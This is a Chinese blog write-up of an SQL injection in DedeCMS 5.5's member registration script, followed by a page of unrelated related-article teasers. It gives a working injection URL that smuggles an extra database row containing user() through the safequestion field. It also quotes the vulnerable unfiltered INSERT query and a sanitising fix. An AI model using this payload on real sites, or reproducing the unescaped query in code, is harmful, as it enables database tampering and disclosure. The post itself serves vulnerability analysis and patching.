当前位置: 首页 > 编程日记 > 正文

dedecms /member/reg_new.php SQL Injection Vul

编程日记 2024-12-12 16:10:00

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

Dedecms会员中心注入漏洞


2. 漏洞触发条件

http://127.0.0.1/dedecms5.5/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=
//把vdcode=slum改成当前的验证码

Relevant Link:

http://0day5.com/archives/1315
http://www.odaysec.com/post/1cb671b0_2709bbf


3. 漏洞影响范围
4. 漏洞代码分析

/member/reg_new.php

..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);//未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询
$inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery))
..


5. 防御方法

/member/reg_new.php

..
$jointime = time();
$logintime = time();
$joinip = GetIP();
$loginip = GetIP();
$pwd = md5($userpwd);
/* 对$mtype、$safeanswer、$safequestion进行有效过滤 */$mtype = HtmlReplace($mtype,1);$safeanswer = HtmlReplace($safeanswer);$safequestion = HtmlReplace($safequestion);
/* */$spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0);$inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
`matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
'0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
if($dsql->ExecuteNoneQuery($inQuery))
{
..


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved


https://www.dkcj.cn/info/31523.html

相关文章:

VC下通过进程ID获取进程镜像文件路径的方法及其存在的缺陷

工作中经常会遇到通过进程ID获取进程镜像文件或者其他模块的路径的需求。&#xff08;转载请指明出处&#xff09;网上关于方案大致存在两种方案&#xff1a; OpenProcess->GetModuleFileNameOpenProcess->EnumProcessModules->GetModuleFileNameEx我试验了下&#x…

编程日记2024/12/12 16:00:00

腾讯云100亿元目标达成,发阳光普照奖iPhone 11 Pro,你酸了吗?

12 月 19 日&#xff0c;鹅厂腾讯发钱的消息又像往年一样引来了一群柠檬精。除了微信支付团队获得 2 亿元奖金的消息之外&#xff0c;一张腾讯云团队每个员工奖励一部 iPhone 11 Pro 的 H5 页面截图也不断地轰炸着朋友圈。原来这张图说的是腾讯云在 Q3 已完成 2019 年全年 100 …

编程日记2024/12/12 15:50:00

分享一个python cookbook的在线教程地址

分享一个python cookbook的在线教程地址&#xff1a;http://python3-cookbook.readthedocs.org/zh_CN/latest/翻译者&#xff1a;熊能转载于:https://blog.51cto.com/verdureorange/1653514

编程日记2024/12/12 15:40:00

优化系统后VS启动不了问题的一种解决方案

本文只讨论使用第三方软件优化系统后&#xff0c;或者您主动禁止服务后导致VS不能启动的问题。(转载请指明出处) 记得大概是08年时&#xff0c;我使用一些软件对电脑启动项做了优化。后来打开VS2005时&#xff0c;发现VS2005会一直保持在“载入界面”&#xff0c;当时十分懊恼&…

编程日记2024/12/12 15:30:00

懂数学的程序员能有多吃香?这是我听过最好的答案丨颠覆认知

懂数学的程序员能有多吃香&#xff1f;关于这个问题&#xff0c;我想每个程序员心中都有自己的答案。之前在网上看到一个很有意思的答案说&#xff1a;我是在做了2年的开发之后&#xff0c;才真正认识到数学对于程序员的重要性&#xff0c;开始系统的学习数学。理由无它&#x…

编程日记2024/12/12 15:20:00

基于OpenCasCade的程序发布问题

基于OpenCasCade二次开发了一个程序&#xff0c;想采用简单的copy的发布&#xff08;部署&#xff09;方式。 但在发布时遇到了很多问题。总结一下。 首先将所有所需的dll拷贝到了执行目录下&#xff0c;然后将程序copy到一台未安装OpenCasCade的机器上运行出错&#xff0c;信…

编程日记2024/12/12 15:10:00

Unity3D移植到自己的Android程序

用Unity3D开发需要把动画效果移植到现有的APP上面。Unity for Android 比较特殊&#xff0c;Unity for IOS 打包是将XCODE工程直接交给开发者&#xff0c;开发者可以在工程的基础上继续添加新的视图&#xff0c;最后由开发者自行打包生成IPA包&#xff0c;发布程序。而Unity fo…

编程日记2024/12/12 15:00:00

一种注册表沙箱的思路、实现

从今年4月份开始&#xff0c;我接触到一个沙箱项目。该项目的需求要求我们的沙箱具有良好的安全性和兼容性。当时我们研究了SandBoxIE和360的沙箱&#xff0c;基本确定通过“重定向”思路来实现这款沙箱。而我主要负责研究注册表这块。&#xff08;转载请指明出处&#xff09;在…

编程日记2024/12/12 14:50:00

PyTorch实现L2和L1正则化的方法 | CSDN博文精选

作者 | pan_jinquan来源 | CSDN博文精选目录1.torch.optim优化器实现L2正则化2.如何判断正则化作用了模型&#xff1f;2.1未加入正则化loss和Accuracy2.1加入正则化loss和Accuracy2.3正则化说明3.自定义正则化的方法3.1自定义正则化Regularization类3.2Regularization使用方法4…

编程日记2024/12/12 14:40:00

构建插件式的应用程序框架(六)----通讯机制(ZT)

前天发了构建插件式的应用程序框架(五)&#xff0d;&#xff0d;&#xff0d;&#xff0d;管理插件这篇文章&#xff0c;有几个朋友在回复中希望了解插件之间是如何通讯的。这个系列的文章写到这里&#xff0c;也该谈谈这个问题了&#xff0c;毕竟已经有了插件管理。不知道大家…

编程日记2024/12/12 14:30:01

【翻译】将Ext JS Grid转换为Excel表格

原文&#xff1a;Converting an Ext 5 Grid to Excel Spreadsheet稍微迟来的礼物——Ext JS Grid转为Excel代码&#xff0c;现在支持Ext JS 5&#xff01;功能包括&#xff1a; - 支持分组 - 数字的处理 VS 字符串数据类型 - 对于不支持客户端下载的浏览器会提交回服务器Enjoy&…

编程日记2024/12/12 14:20:00

AI研究过于集中狭隘,我们是不是该反思了?

作者 | Sergii Shelpuk译者 | 陆离编辑 | 夕颜出品 | AI科技大本营&#xff08;ID: rgznai100&#xff09;【导读】2019年是AI领域更加冷静的一年&#xff0c;少了些喧嚣和泡沫&#xff0c;大浪淘沙留下的是经过检验的真正的AI研究者、实践者。但是你也许没有发现&#xff0c;本…

编程日记2024/12/12 14:10:00

上周回顾:微软与苹果比赛谁更“不安全”

每个月的第二周应该是微软例行发布补丁的日子&#xff0c;本周也不例外&#xff0c;微软如定期新闻发布会一样公布了自己的安全公告。这本来已经成了例如51CTO.com这样关注企业网络安全的媒体重要的素材&#xff0c;不过没想到的是本周苹果偏要抢这个风头……热点一&#xff1a…

编程日记2024/12/12 14:00:00

一种注册表沙箱的思路、实现——注册表的一些基础知识

要做注册表沙箱&#xff0c;就必须要了解部分注册表知识。而注册表的知识很多&#xff0c;本文主要讲述如何在win32系统是上识别注册表映射的。&#xff08;转载请指明出处&#xff09; 在我的xp 32bit系统上&#xff0c;WinR regedit之后打开注册表管理器。我们可以看到如下主…

编程日记2024/12/12 13:50:00

bzoj 2565: 最长双回文串 manacher算法

2565: 最长双回文串 Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://www.lydsy.com/JudgeOnline/problem.php?id2565 Description 顺序和逆序读起来完全一样的串叫做回文串。比如acbca是回文串&#xff0c;而abc不是&#xff08;abc的顺序为“abc”&#xff0c;逆…

编程日记2024/12/12 13:40:00

44岁的微软如何刷新未来?

整理 | 伍杏玲出品 | AI科技大本营&#xff08;ID&#xff1a;rgznai100&#xff09;在当今的“云”时代&#xff0c;很多企业在多个云计算平台部署应用&#xff0c;且需要统一管理和保护应用。在微软Ignite 2019 大会上&#xff0c;为了让企业轻松地在任何类型的基础设施平台上…

编程日记2024/12/12 13:30:00

一种注册表沙箱的思路、实现——Hook Nt函数

Nt函数是在Ring3层最底层的函数了&#xff0c;选择此类函数进行Hook&#xff0c;是为了提高绕过门槛。我的Hook方案使用的是微软的Detours。&#xff08;转载请指明出处&#xff09;Detours的Hook和反Hook的写入如下&#xff1a; DetourTransactionBegin(); DetourUpdateThread…

编程日记2024/12/12 13:20:00

浅析Struts 体系结构与工作原理(图)

Struts 体系结构是目前基于java的 web系统设计中广泛使用的mvc构架。基本概念    Struts是Apache 基金会Jakarta 项目组的一个Open Source 项目&#xff0c;它采用模型-视图-控制器&#xff08;Model-View- Controller&#xff0c;简称MVC&#xff09;模式&#xff0c;能够…

编程日记2024/12/12 13:10:00

2015第22周一Web性能测试工具及IE扩展区别

在高性能web测试工具推荐http://www.jb51.net/article/23034.htm中发现了dynaTrace 感觉很不错&#xff0c;不但可以检测资源加载瀑布图&#xff0c;而且还能监控页面呈现时间&#xff0c;CPU花销&#xff0c;JS分析和执行时间&#xff0c;CSS解析时间的等。http://www.ibm.com…

编程日记2024/12/12 13:00:00

一种注册表沙箱的思路、实现——研究Reactos中注册表函数的实现1

因为我们沙箱注入了一个DLL到了目标进程&#xff0c;并且Hook了一系列NtXX(NtOpenKey)函数&#xff0c;所以我们在注入的代码中是不能使用RegXX(RegOpenKey等)这类函数的。因为RegXX系列函数在底层使用了NtXX系列函数&#xff0c;如果在注入DLL执行Hook后的逻辑中使用了RegXX系…

编程日记2024/12/12 12:50:00

面试大厂背怼!这都搞不定,你只能做“搬运工”!

每一个面试过大厂的程序员似乎总会有种种困境&#xff1a;毕业季参加大厂校招面试&#xff0c;我本以为做过一些真实项目就不错了&#xff0c;没想到根本没问什么项目&#xff0c;都是基础知识&#xff0c;数学、算法&#xff0c;然而平时只喜欢学程序设计。小公司工作3年&…

编程日记2024/12/12 12:40:00

net程序架构开发

< DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd> 程序架构,功能的划分: 数据库(包括存储过程) 数据访问(包括Microsoft Application Blocks for .NET的2.0版) 数据结构(等价于强类型DataSet) 业务逻辑层 业务表现层 数据库:不用说…

编程日记2024/12/12 12:30:00

Java面向对象学习笔记 -- 6(内部类、Timer)

1. 内部类内部类就是在一个类的内部定义的类&#xff0c;有&#xff1a;静态内部类、成员内部类&#xff0c;局部内部类、匿名内部类。-1) 静态内部类&#xff1a;使用static修饰&#xff0c;声明在类体中&#xff0c; 静态内部类中可以访问外部类的静态成员&#xff0c;开发很…

编程日记2024/12/12 12:20:00

30年间,软件开发行业为何Bug纷飞?

作者 | Chris Fox译者 | 弯月&#xff0c;责编 | 屠敏出品 | CSDN&#xff08;ID&#xff1a;CSDNnews&#xff09;【导语】在时间的推移历程中&#xff0c;软件行业早已发生了天翻地覆的变化。和曾经大家习以为常的编码日常相比&#xff0c;越多越多的开发者发现&#xff0c;如…

编程日记2024/12/12 12:10:00

去掉字符串两端的全角空格和半角空格(含源代码)

昨天&#xff0c;遇到了一个技术问题。本来我在程序中用的trim()方法来处理从JSP页面传来的值,后来在测试时&#xff0c;发现当我输入的是全角空格时&#xff0c;trim()方法失效。需求是这样的&#xff0c;只是去掉字符串两端的空格&#xff08;不论是全角空格还是半角空格&…

编程日记2024/12/12 12:00:00

一种注册表沙箱的思路、实现——研究Reactos中注册表函数的实现2

上一篇博文中主要介绍了Reactos中大部分函数的思路和HKEY和HANDLE之间的关系&#xff0c;本文将介绍一些Reactos中有意思的函数和存在bug的函数。&#xff08;转载请指明出处&#xff09;CreateNestedKey是一个辅助创建键的函数&#xff0c;比如我们要创建\Regsitry\User\3\2\1…

编程日记2024/12/12 11:50:00

云计算安全解决方案白皮书(一)

云计算安全解决方案白皮书Jack zhai研究云的安全有两三年了&#xff0c;但形成完整的安全思路&#xff0c;还是去年的事&#xff0c;这也是“流安全”思路形成的主要阶段。云计算的安全问题之所以突出&#xff0c;是因为虚拟机的动态迁移&#xff0c;以及多业务系统交织在一起&…

编程日记2024/12/12 11:40:00

一种注册表沙箱的思路、实现——研究Reactos中注册表函数的实现3

这篇我们看一个”容错“”节省“的实例。一下是一个Win32API的声明&#xff08;转载请指明出处&#xff09; LONG WINAPI RegEnumKeyEx(__in HKEY hKey,__in DWORD dwIndex,__out LPTSTR lpName,__inout LPDWORD lpcName,__reserved LPDWORD lp…

编程日记2024/12/12 11:30:00

腾讯Angel升级:加入图算法,支持十亿节点、千亿边规模!中国首个毕业于Linux AI基金会的开源项目...

出品 | AI科技大本营&#xff08;ID&#xff1a;rgznai100&#xff09;【导语】Angel 是腾讯的首个AI开源项目&#xff0c;于 2016 年底推出、2017年开源。近日&#xff0c;快速发展的 Angel 完成了从 2.0 版本到 3.0 版本的跨越&#xff0c;从一个单纯的模型训练系统进化成包…

编程日记2024/12/12 11:20:00

如何在JSP页面中获取当前系统时间转

出自&#xff1a;http://hi.baidu.com/itfuck_/item/803662469cdf7baa61d7b945 1: import java.util.*; int y,m,d,h,mm; Calendar c Calendar.getInstance(); y c.get(Calendar.YEAR); //年 m c.get(Calendar.MONTH) 1; //月 d c.get(Calendar.DAY_OF_MONTH); //日 …

编程日记2024/12/12 11:10:00